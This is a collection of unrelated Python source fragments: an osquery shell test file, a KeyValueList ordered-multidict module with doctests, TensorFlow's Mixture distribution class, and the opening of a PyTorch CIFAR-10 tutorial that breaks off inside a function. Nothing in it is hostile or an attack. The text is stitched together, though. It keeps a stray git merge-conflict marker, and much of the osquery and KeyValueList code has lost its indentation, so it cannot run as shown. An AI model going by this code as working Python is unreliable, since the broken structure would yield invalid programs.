proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--config_path=%s/../%s" % (test_base.SCRIPT_DIR, example_path)
],
>>>>>>> 769a723b5ccb97037b678a874480f37beb2281c6
SHELL_TIMEOUT)
self.assertEqual(proc.stdout, "")
print (proc.stdout)
print (proc.stderr)
self.assertEqual(proc.proc.poll(), 0)
def test_meta_commands(self):
'''Test the supported meta shell/help/info commands'''
commands = [
'.help',
'.all',
'.all osquery_info',
'.all this_table_does_not_exist',
'.echo',
'.echo on',
'.echo off',
'.header',
'.header off',
'.header on',
'.mode',
'.mode csv',
'.mode column',
'.mode line',
'.mode list',
'.mode pretty',
'.mode this_mode_does_not_exists',
'.nullvalue',
'.nullvalue ""',
'.print',
'.print hello',
'.schema osquery_info',
'.schema this_table_does_not_exist',
'.schema',
'.separator',
'.separator ,',
'.show',
'.tables osquery',
'.tables osquery_info',
'.tables this_table_does_not_exist',
'.tables',
'.trace',
'.width',
'.width 80',
'.timer',
'.timer on',
'.timer off'
]
for command in commands:
result = self.osqueryi.run_command(command)
pass
    @test_base.flaky
    def test_time(self):
        '''Demonstrating basic usage of OsqueryWrapper with the time table'''
        self.osqueryi.run_command(' ')  # flush error output
        result = self.osqueryi.run_query(
            'SELECT hour, minutes, seconds FROM time;')
        self.assertEqual(len(result), 1)
        row = result[0]
        # Bounds are deliberately inclusive/lenient (<= 24, <= 60).
        self.assertTrue(0 <= int(row['hour']) <= 24)
        self.assertTrue(0 <= int(row['minutes']) <= 60)
        self.assertTrue(0 <= int(row['seconds']) <= 60)
    @test_base.flaky
    def test_time_using_all(self):
        # '.all time' must not report a query error.
        self.osqueryi.run_command(' ')
        result = self.osqueryi.run_command('.all time')
        self.assertNotEqual(result.rstrip(), "Error querying table: time")
    @test_base.flaky
    def test_config_bad_json(self):
        # A bad config path ("/") must not prevent queries from running.
        self.osqueryi = test_base.OsqueryWrapper(self.binary,
                                                 args={"config_path": "/"})
        result = self.osqueryi.run_query('SELECT * FROM time;')
        self.assertEqual(len(result), 1)
if __name__ == '__main__':
test_base.Tester().run()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2015, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
class KeyValueList(list):
    """ A KeyValueList is a list of key-value pairs that functions as an
    ordered dictionary with support for duplicate keys.
    An instance can be created using either an iterable sequence of pairs or a
    mapping plus an optional set of keyword arguments:
    >>> kvl = KeyValueList([('a', 1), ('c', 7), 'cx', ('b', [8, 9])], c='b')
    >>> kvl
    KeyValueList([('a', 1), ('c', 7), ('c', 'x'), ('b', [8, 9]), ('c', 'b')])
    This creates a list of values that have both an associated key and a
    positional index:
        index | key | value
       -------+-----+--------
          0   | 'a' | 1
          1   | 'c' | 7
          2   | 'c' | 'x'
          3   | 'b' | [8, 9]
          4   | 'c' | 'b'
    """
    # Doc fix: row 2 previously claimed value 1, but the two-character
    # string 'cx' unpacks to the pair ('c', 'x'), as the repr above shows.
    def __init__(self, iterable=(), **kwargs):
        """Populate from *iterable* (pairs or a mapping), then *kwargs*."""
        list.__init__(self)
        self.extend(iterable)
        self.extend(kwargs)
def __repr__(self):
return "{0}({1})".format(self.__class__.__name__, list.__repr__(self))
def __getitem__(self, index):
""" Get a single item.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[2]
('green', 'grass')
>>> kvl[9]
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: list index out of range
"""
try:
got = list.__getitem__(self, index)
except TypeError:
try:
return next(self.get(index))
except StopIteration:
return None
else:
if isinstance(index, slice):
return KeyValueList(got)
else:
return got
def __getslice__(self, start, end):
""" Get a slice of items.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[1:3]
KeyValueList([('blue', 'sea'), ('green', 'grass')])
"""
try:
return KeyValueList(list.__getslice__(self, start, end))
except AttributeError:
return KeyValueList(list.__getitem__(self, slice(start, end)))
def __setitem__(self, index, item):
""" Set a single item.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[1] = ('yellow', 'sun')
>>> for item in kvl:
... print(item)
('red', 'rose')
('yellow', 'sun')
('green', 'grass')
('blue', 'sky')
>>> kvl[9] = ('orange', 'orange')
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: list assignment index out of range
"""
list.__setitem__(self, index, item)
def __setslice__(self, start, stop, items):
""" Set a slice of items.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl[1:3] = [('yellow', 'sun'), ('grey', 'stone'), ('red', 'berry')]
>>> for item in kvl:
... print(item)
('red', 'rose')
('yellow', 'sun')
('grey', 'stone')
('red', 'berry')
('blue', 'sky')
"""
list.__setslice__(self, start, stop, items)
def __delitem__(self, index):
""" Delete a single item.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> del kvl[1]
>>> for item in kvl:
... print(item)
('red', 'rose')
('green', 'grass')
('blue', 'sky')
>>> del kvl[9]
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: list assignment index out of range
"""
list.__delitem__(self, index)
def __delslice__(self, start, end):
""" Delete a slice of items.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> del kvl[1:3]
>>> for item in kvl:
... print(item)
('red', 'rose')
('blue', 'sky')
"""
list.__delslice__(self, start, end)
def __contains__(self, item):
""" Check for the presence of a particular key-value pair within this
list. This is equivalent to the `has_item` method.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> ('blue', 'sea') in kvl
True
>>> ('yellow', 'sun') in kvl
False
>>> ('purple', 'grape') not in kvl
True
>>> ('red', 'rose') not in kvl
False
"""
key, value = item
return self.has_item(key, value)
def __iter__(self):
""" Iterate through all items in this list. This is equivalent to the
`items` method with `collect` set to False.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key, value in kvl:
... print("{0} -> {1}".format(key, value))
red -> rose
blue -> sea
green -> grass
blue -> sky
"""
return list.__iter__(self)
def append(self, key, value):
""" Append a single key-value pair to the end of this list.
>>> kvl = KeyValueList()
>>> kvl.append('one', 'eins')
>>> kvl.append('two', 'zwei')
>>> kvl.append('three', 'drei')
>>> for item in kvl:
... print(item)
('one', 'eins')
('two', 'zwei')
('three', 'drei')
"""
list.append(self, (key, value))
def extend(self, iterable):
""" Concatenate two lists by adding a list of extra items to the end
of this list. Each item added must be capable of being unpacked into a
key-value pair.
>>> kvl = KeyValueList([('one', 'eins'), ('two', 'zwei')])
>>> kvl.extend([('three', 'drei'), ('four', 'vier')])
>>> for item in kvl:
... print(item)
('one', 'eins')
('two', 'zwei')
('three', 'drei')
('four', 'vier')
>>> kvl.extend(['five', 'six'])
Traceback (most recent call last):
File "<stdin>", line 1, in ?
ValueError: KeyValueList items must be pairs
"""
if isinstance(iterable, Mapping):
list.extend(self, iterable.items())
else:
try:
list.extend(self, ((k, v) for k, v in iterable))
except ValueError:
raise ValueError("KeyValueList items must be pairs")
def insert(self, index, key, value):
""" Insert a key-value pair at a particular position within the list:
>>> kvl = KeyValueList({'three': 'drei'})
>>> kvl.insert(0, 'one', 'eins')
>>> kvl.insert(1, 'two', 'zwei')
>>> for item in kvl:
... print(item)
('one', 'eins')
('two', 'zwei')
('three', 'drei')
"""
list.insert(self, index, (key, value))
def has_item(self, key, value):
""" Check for the presence of a particular key-value pair within this
list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.has_item('green', 'grass')
True
>>> kvl.has_item('pink', 'rose')
False
"""
for k, v in self:
if k == key and v == value:
return True
return False
def has_key(self, key):
""" Check for the presence of a particular key within this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.has_key('blue')
True
>>> kvl.has_key('yellow')
False
"""
for k, v in self:
if k == key:
return True
return False
def has_value(self, value):
""" Check for the presence of a particular value within this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.has_value('grass')
True
>>> kvl.has_value('sun')
False
"""
for k, v in self:
if v == value:
return True
return False
def get(self, key):
""" Iterate through all values associated with the specified key.
Non-existent keys return empty iterators.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for value in kvl.get('blue'):
... print(value)
sea
sky
>>> for value in kvl.get('yellow'):
... print(value)
"""
return (v for k, v in self if k == key)
    def put(self, key, *values):
        """ Replace all values associated with the specified key with the
        value arguments provided. If fewer values are specified than currently
        exist, remaining items will be removed; if more items are specified,
        these will be appended to the end of the list.
        >>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
        ...                     ('blue', 'sky')])
        >>> kvl.put('blue', 'jeans')
        >>> kvl
        KeyValueList([('red', 'rose'), ('blue', 'jeans')])
        >>> kvl.put('red', 'heart', 'berry')
        >>> kvl
        KeyValueList([('red', 'heart'), ('blue', 'jeans'), ('red', 'berry')])
        """
        new_values = list(values)
        # Rebuild in place: each matching position consumes the next new
        # value (pop(0)); once new_values is exhausted, remaining matches
        # are dropped by the filter clause below.
        self[:] = [
            (k, value) if k != key else (k, new_values.pop(0))
            for k, value in self
            if k != key or new_values
        ]
        # Surplus new values are appended at the end under the same key.
        self.extend([(key, value) for value in new_values])
def remove(self, key):
""" Remove all items from this list that contain the key specified. If
the key is not found, a ValueError is raised.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.remove('blue')
>>> kvl
KeyValueList([('red', 'rose'), ('green', 'grass')])
>>> kvl.remove('yellow')
Traceback (most recent call last):
File "<stdin>", line 1, in ?
ValueError: Key 'yellow' not in list
"""
length = len(self)
self[:] = ((k, v) for k, v in self if k != key)
if len(self) == length:
raise ValueError("Key {0} not in list".format(repr(key)))
def pop(self, index=None):
""" Remove the item at the index specified and return it. If no index
is specified, the last item is popped. If the index is out of range, an
IndexError is raised.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> kvl.pop(2)
('green', 'grass')
>>> kvl.pop()
('blue', 'sky')
>>> kvl.pop(6)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
IndexError: pop index out of range
"""
if index is None:
return list.pop(self)
else:
return list.pop(self, index)
def clear(self):
""" Remove all items from this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> len(kvl)
4
>>> kvl.clear()
>>> len(kvl)
0
"""
del self[:]
def sort(self, *args, **kwargs):
""" Sort the items in this list into ascending order.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for item in kvl:
... print(item)
('red', 'rose')
('blue', 'sea')
('green', 'grass')
('blue', 'sky')
>>> kvl.sort()
>>> for item in kvl:
... print(item)
('blue', 'sea')
('blue', 'sky')
('green', 'grass')
('red', 'rose')
"""
list.sort(self, *args, **kwargs)
def reverse(self):
""" Reverse the order of items in this list.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for item in kvl:
... print(item)
('red', 'rose')
('blue', 'sea')
('green', 'grass')
('blue', 'sky')
>>> kvl.reverse()
>>> for item in kvl:
... print(item)
('blue', 'sky')
('green', 'grass')
('blue', 'sea')
('red', 'rose')
"""
list.reverse(self)
def copy(self):
""" Create and return a shallow copy of this list instance.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea')])
>>> kvl
KeyValueList([('red', 'rose'), ('blue', 'sea')])
>>> kvl2 = kvl.copy()
>>> kvl2.append('green', 'grass')
>>> kvl
KeyValueList([('red', 'rose'), ('blue', 'sea')])
>>> kvl2
KeyValueList([('red', 'rose'), ('blue', 'sea'), ('green', 'grass')])
"""
return KeyValueList(self)
def iterkeys(self, collect=False):
""" Iterate through the keys in this list. If `collect` is True,
yield only unique keys.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key in kvl.iterkeys():
... print(key)
red
blue
green
blue
>>> for key in kvl.iterkeys(collect=True):
... print(key)
red
blue
green
"""
if collect:
keys = []
for k, v in self:
if k not in keys:
keys.append(k)
yield k
else:
for k, v in self:
yield k
def itervalues(self, collect=False):
""" Iterate through the values in this list. If `collect` is True,
yield a list of values for each unique key.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key in kvl.itervalues():
... print(key)
rose
sea
grass
sky
>>> for key in kvl.itervalues(collect=True):
... print(key)
['rose']
['sea', 'sky']
['grass']
"""
if collect:
keys, values = [], []
for k, v in self:
try:
index = keys.index(k)
except ValueError:
keys.append(k)
values.append([v])
else:
values[index].append((v))
for value in values:
yield value
else:
for k, v in self:
yield v
def iteritems(self, collect=False):
""" Iterate through the items in this list. If `collect` is True,
yield only one item for each unique key, each with a list of
associated values.
>>> kvl = KeyValueList([('red', 'rose'), ('blue', 'sea'),
... ('green', 'grass'), ('blue', 'sky')])
>>> for key in kvl.iteritems():
... print(key)
('red', 'rose')
('blue', 'sea')
('green', 'grass')
('blue', 'sky')
>>> for key in kvl.iteritems(collect=True):
... print(key)
('red', ['rose'])
('blue', ['sea', 'sky'])
('green', ['grass'])
"""
if collect:
keys, items = [], []
for k, v in self:
try:
index = keys.index(k)
except ValueError:
keys.append(k)
items.append((k, [v]))
else:
items[index][1].append((v))
for item in items:
yield item
else:
for item in self:
yield item
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Mixture distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import categorical
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
class Mixture(distribution.Distribution):
  """Mixture distribution.

  The `Mixture` object implements batched mixture distributions.
  The mixture model is defined by a `Categorical` distribution (the mixture)
  and a python list of `Distribution` objects.

  Methods supported include `log_prob`, `prob`, `mean`, `sample`, and
  `entropy_lower_bound`.
  """

  def __init__(self,
               cat,
               components,
               validate_args=False,
               allow_nan_stats=True,
               name="Mixture"):
    """Initialize a Mixture distribution.

    A `Mixture` is defined by a `Categorical` (`cat`, representing the
    mixture probabilities) and a list of `Distribution` objects
    all having matching dtype, batch shape, event shape, and continuity
    properties (the components).

    The `num_classes` of `cat` must be possible to infer at graph construction
    time and match `len(components)`.

    Args:
      cat: A `Categorical` distribution instance, representing the probabilities
        of selecting each entry of `components`.
      components: A list or tuple of `Distribution` instances.
        Each instance must have the same type, be defined on the same domain,
        and have matching `event_shape` and `batch_shape`.
      validate_args: Python `bool`, default `False`. If `True`, raise a runtime
        error if batch or event ranks are inconsistent between cat and any of
        the distributions. This is only checked if the ranks cannot be
        determined statically at graph construction time.
      allow_nan_stats: Boolean, default `True`. If `False`, raise an
        exception if a statistic (e.g. mean/mode/etc...) is undefined for any
        batch member. If `True`, batch members with valid parameters leading to
        undefined statistics will return NaN for this statistic.
      name: A name for this distribution (optional).

    Raises:
      TypeError: If cat is not a `Categorical`, or `components` is not
        a list or tuple, or the elements of `components` are not
        instances of `Distribution`, or do not have matching `dtype`.
      ValueError: If `components` is an empty list or tuple, or its
        elements do not have a statically known event rank.
        If `cat.num_classes` cannot be inferred at graph creation time,
        or the constant value of `cat.num_classes` is not equal to
        `len(components)`, or all `components` and `cat` do not have
        matching static batch shapes, or all components do not
        have matching static event shapes.
    """
    # Captured first so it records exactly the constructor arguments.
    parameters = locals()
    if not isinstance(cat, categorical.Categorical):
      raise TypeError("cat must be a Categorical distribution, but saw: %s" %
                      cat)
    if not components:
      raise ValueError("components must be a non-empty list or tuple")
    if not isinstance(components, (list, tuple)):
      raise TypeError("components must be a list or tuple, but saw: %s" %
                      components)
    if not all(isinstance(c, distribution.Distribution) for c in components):
      raise TypeError(
          "all entries in components must be Distribution instances"
          " but saw: %s" % components)
    dtype = components[0].dtype
    if not all(d.dtype == dtype for d in components):
      raise TypeError("All components must have the same dtype, but saw "
                      "dtypes: %s" % [(d.name, d.dtype) for d in components])
    static_event_shape = components[0].event_shape
    static_batch_shape = cat.batch_shape
    for d in components:
      # merge_with raises ValueError if any two static shapes are
      # incompatible, enforcing matching shapes across all components.
      static_event_shape = static_event_shape.merge_with(d.event_shape)
      static_batch_shape = static_batch_shape.merge_with(d.batch_shape)
    if static_event_shape.ndims is None:
      raise ValueError(
          "Expected to know rank(event_shape) from components, but "
          "none of the components provide a static number of ndims")
    # Ensure that all batch and event ndims are consistent.
    with ops.name_scope(name, values=[cat.logits]) as ns:
      num_components = cat.event_size
      static_num_components = tensor_util.constant_value(num_components)
      if static_num_components is None:
        raise ValueError(
            "Could not infer number of classes from cat and unable "
            "to compare this value to the number of components passed in.")
      # Possibly convert from numpy 0-D array.
      static_num_components = int(static_num_components)
      if static_num_components != len(components):
        raise ValueError("cat.num_classes != len(components): %d vs. %d" %
                         (static_num_components, len(components)))
      cat_batch_shape = cat.batch_shape_tensor()
      cat_batch_rank = array_ops.size(cat_batch_shape)
      if validate_args:
        # Build runtime assertions comparing each component's dynamic batch
        # rank/shape to the Categorical's; they run via control_dependencies
        # in the _mean/_log_prob/_sample_n methods below.
        batch_shapes = [d.batch_shape_tensor() for d in components]
        batch_ranks = [array_ops.size(bs) for bs in batch_shapes]
        check_message = ("components[%d] batch shape must match cat "
                         "batch shape")
        self._assertions = [
            check_ops.assert_equal(
                cat_batch_rank, batch_ranks[di], message=check_message % di)
            for di in range(len(components))
        ]
        self._assertions += [
            check_ops.assert_equal(
                cat_batch_shape, batch_shapes[di], message=check_message % di)
            for di in range(len(components))
        ]
      else:
        self._assertions = []
      self._cat = cat
      self._components = list(components)
      self._num_components = static_num_components
      self._static_event_shape = static_event_shape
      self._static_batch_shape = static_batch_shape
    # We let the Mixture distribution access _graph_parents since its arguably
    # more like a baseclass.
    graph_parents = self._cat._graph_parents  # pylint: disable=protected-access
    for c in self._components:
      graph_parents += c._graph_parents  # pylint: disable=protected-access
    super(Mixture, self).__init__(
        dtype=dtype,
        reparameterization_type=distribution.NOT_REPARAMETERIZED,
        validate_args=validate_args,
        allow_nan_stats=allow_nan_stats,
        parameters=parameters,
        graph_parents=graph_parents,
        name=ns)

  @property
  def cat(self):
    """The mixing `Categorical` distribution."""
    return self._cat

  @property
  def components(self):
    """The list of component `Distribution` instances."""
    return self._components

  @property
  def num_components(self):
    """Static (Python int) number of mixture components."""
    return self._num_components

  def _batch_shape_tensor(self):
    return self._cat.batch_shape_tensor()

  def _batch_shape(self):
    return self._static_batch_shape

  def _event_shape_tensor(self):
    # All components were verified to share event shape at construction.
    return self._components[0].event_shape_tensor()

  def _event_shape(self):
    return self._static_event_shape

  def _mean(self):
    """Mixture mean: sum_i cat_prob_i * component_i.mean()."""
    with ops.control_dependencies(self._assertions):
      distribution_means = [d.mean() for d in self.components]
      cat_probs = self._cat_probs(log_probs=False)
      # This was checked to not be None at construction time.
      static_event_rank = self.event_shape.ndims
      # Expand the rank of x up to static_event_rank times so that
      # broadcasting works correctly.
      def expand(x):
        expanded_x = x
        for _ in range(static_event_rank):
          expanded_x = array_ops.expand_dims(expanded_x, -1)
        return expanded_x
      cat_probs = [expand(c_p) for c_p in cat_probs]
      partial_means = [
          c_p * m for (c_p, m) in zip(cat_probs, distribution_means)
      ]
      # These should all be the same shape by virtue of matching
      # batch_shape and event_shape.
      return math_ops.add_n(partial_means)

  def _log_prob(self, x):
    """log prob(x) = logsumexp_i(log cat_prob_i + component_i.log_prob(x))."""
    with ops.control_dependencies(self._assertions):
      x = ops.convert_to_tensor(x, name="x")
      distribution_log_probs = [d.log_prob(x) for d in self.components]
      cat_log_probs = self._cat_probs(log_probs=True)
      final_log_probs = [
          cat_lp + d_lp
          for (cat_lp, d_lp) in zip(cat_log_probs, distribution_log_probs)
      ]
      # Stack the per-component log probs along a new leading axis, then
      # reduce it with logsumexp for numerical stability.
      concat_log_probs = array_ops.stack(final_log_probs, 0)
      log_sum_exp = math_ops.reduce_logsumexp(concat_log_probs, [0])
      return log_sum_exp

  def _prob(self, x):
    return math_ops.exp(self._log_prob(x))

  def _sample_n(self, n, seed=None):
    """Draw n samples: sample the mixing Categorical, then sample each
    component only for the entries assigned to it, and stitch the pieces
    back together with dynamic_stitch."""
    with ops.control_dependencies(self._assertions):
      n = ops.convert_to_tensor(n, name="n")
      static_n = tensor_util.constant_value(n)
      n = int(static_n) if static_n is not None else n
      cat_samples = self.cat.sample(n, seed=seed)
      static_samples_shape = cat_samples.get_shape()
      if static_samples_shape.is_fully_defined():
        samples_shape = static_samples_shape.as_list()
        samples_size = static_samples_shape.num_elements()
      else:
        samples_shape = array_ops.shape(cat_samples)
        samples_size = array_ops.size(cat_samples)
      static_batch_shape = self.batch_shape
      if static_batch_shape.is_fully_defined():
        batch_shape = static_batch_shape.as_list()
        batch_size = static_batch_shape.num_elements()
      else:
        batch_shape = self.batch_shape_tensor()
        batch_size = math_ops.reduce_prod(batch_shape)
      static_event_shape = self.event_shape
      if static_event_shape.is_fully_defined():
        event_shape = np.array(static_event_shape.as_list(), dtype=np.int32)
      else:
        event_shape = self.event_shape_tensor()
      # Get indices into the raw cat sampling tensor. We will
      # need these to stitch sample values back out after sampling
      # within the component partitions.
      samples_raw_indices = array_ops.reshape(
          math_ops.range(0, samples_size), samples_shape)
      # Partition the raw indices so that we can use
      # dynamic_stitch later to reconstruct the samples from the
      # known partitions.
      partitioned_samples_indices = data_flow_ops.dynamic_partition(
          data=samples_raw_indices,
          partitions=cat_samples,
          num_partitions=self.num_components)
      # Copy the batch indices n times, as we will need to know
      # these to pull out the appropriate rows within the
      # component partitions.
      batch_raw_indices = array_ops.reshape(
          array_ops.tile(math_ops.range(0, batch_size), [n]), samples_shape)
      # Explanation of the dynamic partitioning below:
      #   batch indices are i.e., [0, 1, 0, 1, 0, 1]
      # Suppose partitions are:
      #     [1 1 0 0 1 1]
      # After partitioning, batch indices are cut as:
      #     [batch_indices[x] for x in 2, 3]
      #     [batch_indices[x] for x in 0, 1, 4, 5]
      # i.e.
      #     [1 1] and [0 0 0 0]
      # Now we sample n=2 from part 0 and n=4 from part 1.
      # For part 0 we want samples from batch entries 1, 1 (samples 0, 1),
      # and for part 1 we want samples from batch entries 0, 0, 0, 0
      #   (samples 0, 1, 2, 3).
      partitioned_batch_indices = data_flow_ops.dynamic_partition(
          data=batch_raw_indices,
          partitions=cat_samples,
          num_partitions=self.num_components)
      samples_class = [None for _ in range(self.num_components)]
      for c in range(self.num_components):
        n_class = array_ops.size(partitioned_samples_indices[c])
        # A distinct derived seed per component keeps component draws
        # independent while remaining deterministic given `seed`.
        seed = distribution_util.gen_new_seed(seed, "mixture")
        samples_class_c = self.components[c].sample(n_class, seed=seed)
        # Pull out the correct batch entries from each index.
        # To do this, we may have to flatten the batch shape.
        # For sample s, batch element b of component c, we get the
        # partitioned batch indices from
        # partitioned_batch_indices[c]; and shift each element by
        # the sample index. The final lookup can be thought of as
        # a matrix gather along locations (s, b) in
        # samples_class_c where the n_class rows correspond to
        # samples within this component and the batch_size columns
        # correspond to batch elements within the component.
        #
        # Thus the lookup index is
        #   lookup[c, i] = batch_size * s[i] + b[c, i]
        # for i = 0 ... n_class[c] - 1.
        lookup_partitioned_batch_indices = (
            batch_size * math_ops.range(n_class) +
            partitioned_batch_indices[c])
        samples_class_c = array_ops.reshape(
            samples_class_c,
            array_ops.concat([[n_class * batch_size], event_shape], 0))
        samples_class_c = array_ops.gather(
            samples_class_c, lookup_partitioned_batch_indices,
            name="samples_class_c_gather")
        samples_class[c] = samples_class_c
      # Stitch back together the samples across the components.
      lhs_flat_ret = data_flow_ops.dynamic_stitch(
          indices=partitioned_samples_indices, data=samples_class)
      # Reshape back to proper sample, batch, and event shape.
      ret = array_ops.reshape(lhs_flat_ret,
                              array_ops.concat([samples_shape,
                                                self.event_shape_tensor()], 0))
      ret.set_shape(
          tensor_shape.TensorShape(static_samples_shape).concatenate(
              self.event_shape))
      return ret

  def entropy_lower_bound(self, name="entropy_lower_bound"):
    r"""A lower bound on the entropy of this mixture model.

    The bound below is not always very tight, and its usefulness depends
    on the mixture probabilities and the components in use.

    A lower bound is useful for ELBO when the `Mixture` is the variational
    distribution:

    \\(
    \log p(x) >= ELBO = \int q(z) \log p(x, z) dz + H[q]
    \\)

    where \\( p \\) is the prior distribution, \\( q \\) is the variational,
    and \\( H[q] \\) is the entropy of \\( q \\). If there is a lower bound
    \\( G[q] \\) such that \\( H[q] \geq G[q] \\) then it can be used in
    place of \\( H[q] \\).

    For a mixture of distributions \\( q(Z) = \sum_i c_i q_i(Z) \\) with
    \\( \sum_i c_i = 1 \\), by the concavity of \\( f(x) = -x \log x \\), a
    simple lower bound is:

    \\(
    \begin{align}
    H[q] & = - \int q(z) \log q(z) dz \\\
       & = - \int (\sum_i c_i q_i(z)) \log(\sum_i c_i q_i(z)) dz \\\
       & \geq - \sum_i c_i \int q_i(z) \log q_i(z) dz \\\
       & = \sum_i c_i H[q_i]
    \end{align}
    \\)

    This is the term we calculate below for \\( G[q] \\).

    Args:
      name: A name for this operation (optional).

    Returns:
      A lower bound on the Mixture's entropy.
    """
    with self._name_scope(name, values=[self.cat.logits]):
      with ops.control_dependencies(self._assertions):
        distribution_entropies = [d.entropy() for d in self.components]
        cat_probs = self._cat_probs(log_probs=False)
        partial_entropies = [
            c_p * m for (c_p, m) in zip(cat_probs, distribution_entropies)
        ]
        # These are all the same shape by virtue of matching batch_shape
        return math_ops.add_n(partial_entropies)

  def _cat_probs(self, log_probs):
    """Get a list of num_components batchwise probabilities."""
    which_softmax = nn_ops.log_softmax if log_probs else nn_ops.softmax
    cat_probs = which_softmax(self.cat.logits)
    # Unstack along the component axis: one [batch_shape] tensor per component.
    cat_probs = array_ops.unstack(cat_probs, num=self.num_components, axis=-1)
    return cat_probs
| |
# http://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
# 2017-Oct-30 02:12
# WNixalo
# TRAINING A CLASSIFIER
# Generally for data you can use std python packages that load data into a
# NumPy Array. Then convert this array into a torch.*Tensor
# * For images: Pillow & OpenCV are useful
# * For audio: scipy & librosa
# * For text: either raw Python or Cython based loading, or NLTK & SpaCy
# torchvision is specfly created for vision; has data loaders for common data-
# sets: ImageNet, CIFAR10, MNIST, etc. and data trsfmrs for images, viz.,
# torchvision.datasets, and torch.utils.data.DataLoader
# this tutorial will use the CIFAR10 dataset. CIFAR-10 imgs are size 3x32x32
# (10 classes)
# TRAINING AN IMAGE CLASSIFIER
# 1. Load and Normalize the CIFAR10 training/test datsets using torchvision
# 2. Define a Convolutional Neural Network
# 3. Define a Loss Function
# 4. Train the network on the trainind data
# 5. Test the network on the test data
# 1. LOADING AND NORMALIZING CIFAR10
# Using torch vision:
import torch
import torchvision
import torchvision.transforms as transforms
# torchvision datasets output are PILImage images of range[0,1]. We trsfm them
# to Tensors of normalized range[-1,1]
# PIL images arrive as tensors in [0, 1]; Normalize((0.5,)*3, (0.5,)*3)
# maps each channel to [-1, 1] via (x - 0.5) / 0.5.
transform = transforms.Compose(
    [transforms.ToTensor(),
     transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])

trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
                                        download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4,
                                          shuffle=True, num_workers=2)

testset = torchvision.datasets.CIFAR10(root='./data', train=False,
                                       download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4,
                                         shuffle=False, num_workers=2)

# CIFAR-10 label names, indexed by class id. (The original assigned this
# tuple twice in a row; the duplicate assignment was removed.)
classes = ('plane', 'car', 'bird', 'cat',
           'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Showing some of the training images:
import matplotlib.pyplot as plt
import numpy as np
# functions to show an image
def imshow(img):
    """Undo the [-1, 1] normalization and display a (C, H, W) image tensor."""
